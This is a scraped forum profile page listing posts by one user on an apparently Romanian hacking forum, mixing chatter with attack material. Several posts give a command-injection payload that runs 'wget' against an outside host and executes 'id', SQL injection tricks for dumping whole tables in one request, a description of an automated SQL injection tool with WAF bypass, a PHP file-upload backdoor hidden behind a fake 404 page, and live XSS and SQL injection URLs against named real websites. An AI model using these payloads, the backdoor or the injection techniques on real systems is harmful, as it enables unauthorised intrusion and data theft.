Jump to content

dancezar

Active Members
  • Posts

    981
  • Joined

  • Last visited

  • Days Won

    20

Everything posted by dancezar

  1. <script> setTimeout(function(){location='http://www.site.com/link'},3000); </script> Acolo e pentru 3 secunde , modifici cu valoarea pe care o vrei tu , 4000 4 secunde 5000 5 secunde samd.
  2. SmiliesPlugin%3b$link=%22wget%22.chr(32).%22http://site.com/aaaa%22%3bprint%28%22Content-Type:text/html\r\n\r\nVulnerable!%22%29%3bsystem($link)%3bexit Problema is spatiile...
  3. SmiliesPlugin%3bprint%28%22Content-Type:text/html\r\n\r\nVulnerable!%22.qx/id/%29%3bexit
  4. 12 caractere. Sa vina baieti cu ghilimica aka "script alert 1" sa il rezolve. @Nytro este userul cu priv. limitate nu poti extrage datele din baza de date principala unde is useri si alte date mai "importante" alea is pe alt user:) // 10 caractere mai putin de atata nu se poate
  5. OFF: http://hackforums.net/showthread.php?tid=4457709 )
  6. Update. Zippyshare.com - hsqli.rar La cererea lui @_XaXaXa_ , am adaugat POST injection , si optiunea de a adauga cookies , din set_cookies.php?url=http://site.com/login.php , sau direct din fisierul cookies.txt . Urmatorul update va contine suport MSSQL injection si Postgres, cand voi avea timp desigur.
  7. https://rstforums.com/forum/85524-sqli-challenge.rst Dai drumu si la asta. Poti sa imi trimiti sintaxa pe pm ? sunt curios de un lucru
  8. Alta e faza , tu trebuie sa bagi tot codul ala dupa body , de ce? pentru ca tu incluzandu-l in head, celelalte elemente vor fi incarcate dupa el , si de aia primesti eroarea aia cu property of null . Ori bagi codul ala la sfarsitul body , ori bagi acele 4 linii de la inceput cu document.getElementById(...) in <script> document.body.onload=function(){ primele 4 linii de cod }; </script>
  9. Reverse:) citit de la dreapta la stanga
  10. zachary1337 e cocalar. Zachary1337 cel putin la sqli te baga sub masa,nu prea am ideie ce stii tu ,dar daca esti asa bun rezolva si tu acest sqli , oricum sunt sigur ca nu il faci pentru ca iti trebuie ceva cunostinte .
  11. Om serios am cumparat de la el un cont de ipsocks rapid si promt nu am stat dupa el ,a fost excelent am platit bani am primit ce am vrut:D

  12. Sa ma pis pe chatu vostru. acuma serios parca va ia cineva pâinea de la gur? cand luati ban pe chat in fiecare saptamana trebuie sa apara un carnat de asta pe index pornind de la o fraza "de ce mi-a dat ban cutare pe chat?" da p?i de ce plm nu-l intrebi pe PM si rezolvati acolo nu în?eleg ,cui ii pas? cum si de ce a luat ban X pe chat .
  13. E tot unu de pe RST stai calm si cel mai probabil tot ala care a incercat sa il vanda si inainte.A vazut ca pe aici nu prea ii merge si a incercat si pe hackforums, cu video-ul meu si arhiva pusa cu survey:)))
  14. Probabil e de la numele fisierelor , incerca sa le dai nume care sa contina numai caractere 0-9 a-z:)
  15. http://www.zoomjobs.ro/locuri-de-munca/?sortare=&q=%27||this.value!=%27%27%29{alert%281%29;}// Da click pe search boxu //Am gasit si un sql injection blind da-mi pm pentru asta //Inca unul //un Fpd
  16. It's the same shit... Ideia de baza e ca esti responsabil de faptele pe care le faci nu cel care face programul. Ce atata vorbarie...
  17. nintendo asta vorbeste aiurea numai ca sa se bage in seama , chiar daca el isi da seama ca spune o tampenie continua sa sustina prostia lui ca sa te convinga ca idiotenia lui e adevarata. Daca un copil foloseste un tool creat in python pentru a face rau, asta inseamna ca cei care au creat python sunt vinovati? Sau un exemplu si mai practic, daca tu dai cu haviju intr-un site GOV , pe cine baga la bulau , pe tine sau pe cei de la itsecteam?
  18. Ma gandeam sa bag si asa ceva + post injection, dar nu prea am mai avut chef sa lucrez la el, dar am sa adaug si aceasta functionalitate. verdelemeu , la ce te referi la search field? Alte idei , ce ati mai vrea sa vedeti pe un Tool de genul ca sa mai fac un update?
  19. Sa iti explic ceva havij cand scoate date dintr-un tabel date foloste o sintaxa de genul select concat(coloana,coloana2,coloana3) from tabel limit X,1 X ala merge de la 0 pana la cate randuri sunt in tabel. De ce sa faci asta cand poti face asta (select @ from(select @:=0x00,(select 0 from tabel where @ in(@:=concat(@,coloana,coloana1,coloana2))))x) Asa le va scoate taote randurile odata iar in logurile victimei in loc sa apara 3000 de requesturi(sau cate randuri sunt) , va aparea decat un singur request. Havij nu se foloseste optim de erorile bazei de date , daca in sursa apare eroarea You Have a error in your sintax, el v-a incerca sa caute numarul de coloane si va incepe sa faca: union select 1 union select 1,2 union select 1,2,3 union select 1,2,3,4 ...... etc. De ce sa faca atata requesturi cand poate face: group by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100 iar dintr-un sigur request in sursa v-a aparea o eroare de genu Unknow column '34' sa zicem , inseamna ca sunt 33 de coloane.1 request vs 33 de requesturi.
  20. Super ce sa zic, munca mea a ajuns sa valoreze 10 euro pentru unu care nu scris o line de cod in acel script. "Nu il dau la nimeni promit il pastrez pentru mine" In spatele lui Romania94 , oare se ascune un mic kronalau? Mno am sa il public , m-am saturat sa stau la vanatoare de cocalari , daca e cineva care l-a cumparat si-a luat teapa il public. Data viitoare la astia care l-am dat si au distribuit fara acordul meu ( nu dau nume dar sper sa se simta ) , mai vedeti pula de la mine clar!
  21. # jsSql Injection # Automated Mysql injection ,Web based tool # Injectii suportate: [+] Union based [+] Error based # Caracteristici Union Based Detectarea automata a keywordului si a tipului de date String/Integer Se foloseste de eroarea "You have a error in your sintax" pentru a obtine numarul de coloane in numai un request Poate numara coloanele cu Order by sau group by Poate numara coloanele direct in union ( union select 1 ; union select 1,2 ; union select 1,2,3; etc...) Poate incerca si JOIN sintax pentru virgula bypass Poate extrage Baze de de date , Tabele, Coloane,Date prin Dump in one shot sau benchmark In cazul in care cele de sus nu merg poate extrage Baze de date ,tabele ,coloane,date cu Limit x,1 Se poate selecta un fisier unde sa faca DUMP Poate citi fisiere prin load_file Se poate executa propria sintaxa SELECT Prin intermediul unei liste cu cele mai comune tabele si coloane poate ghici unele , in cazul in care nu exista information_schema # Caracteristici Error Based Incearca 3 sintaxe diferite ,se poate seta de la setari o a patra sintaxa pentru order by injection Extrage Baze de de date , Tabele, Coloane,Date Se poate selecta un fisier unde sa faca DUMP Prin intermediul unuei liste cu cele mai comune tabele si coloane poate ghici unele ,in cazul in care nu exista information_schema # Alte caracteristici si optiuni: [+] O functie pentru WAF Bypass ce foloseste /*!12345 */ + url encode + + () urlencoded [+] Un admin panel finder cu 10 threaduri [+] %Inject% pentru a indica locul unde sa injecteze ex: site.com/script.php?id=1%Inject%&parametru_non_vulnerabil sau cand trebuie pus ) in fata ex: site.com/script.php?id=1)%Inject%&parametru_non_vulnerabil sau cand este nevoie de " in loc de ' site.com/script.php?id=1"%Inject%&parametru_non_vulnerabil [+] Load_file fuzzer (impreuna cu o lista aflata in fisierul base.js poate ghici fisierele aflate pe server , daca scriptul ruleaza pe un user cu file_priv=Y) Fisiere: index.html base.js s.php s2.php keywords.php admin_p.html
  22. Ai bagat o tona de else-uri inutile si acolade de mi se face rau. In primul rand daca nu ai mai mult de doua actiuni intr-un bloc if / while /for /else /else if etc ... nu trebuie puse acolade faci economie de spatiu. L-ai facut mai mult la misto? Pentru ca atunci cand faci upload la fisier nu v-a mai functiona al doilea if in care verifica daca exista parola din $_POST (nu stiu de ce ai mai pus si parola in post... puteai sa lasi decat cookie-ul). Ca sa functioneze corecct trebuie sa trimiti si parola prin post.... Desi mi se pare o tampenie poftim cam asa ar trebuie sa arate <?php $file = __FILE__;// Penutru ce iti trebuie asta? error_reporting(0); if(isset($_COOKIE['parola'])){ if(isset($_POST['parola2'])){ $backdoor = $_POST['parola2']; if(md5($backdoor) == '078f6d2d803c24911d309eee0cc01152'){ //macar un md5 pune // Pagina de upload apare doar daca pasii sunt trecuti cu success. /* ------------------------------------------------------------------------------------------------------------- # forma de upload HTML -------------------------------------------------------------------------------------------------------------*/ echo '<style type="text/css"> body { background-color: white; font-weight: inherit; } </style> <center>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"><input type="hidden" name="parola2" value="'.$backdoor.'"></form>'; /* ------------------------------------------------------------------------------------------------------------- #Functiile PHP de urcare fisiere -------------------------------------------------------------------------------------------------------------*/ if( $_POST['_upl'] == "Upload" ) if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) echo '<b><font color="#0ACC00">Fisierul a fost incarcat cu succes!</font></b><br><br>'; else echo '<b><font color="#CC0000">Fisierul nu a putut fi incarcat!</font></b><br><br></font>'; } exit;//iesim din script } } echo "<html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL $file was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address>Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/10.10 mod_perl/2.0.6 Perl/v5.10.1 mod_antiloris/0.4 Server at xcp.ro Port 80</address> </body></html>"; /* -------------------------------------------------------------------------------------------------------------*/ ?>
  23. Persistent: Lordimg | Free upload image - adadsa - album - lolo Persistent 2: http://lordimg.com/album/adadsa/%22;alert%281%29;a=%22-2/1 Nu e reflected , e persistent al doilea .... Sql injection union based: http://s23.postimg.org/ecv2cd009/sqli.png + XSS reflected mai peste tot , la contact , la setari , si inca altele Destul de grav zic eu @Maryan97 da-mi pm ca sa afli cum le-am reprodus
×
×
  • Create New...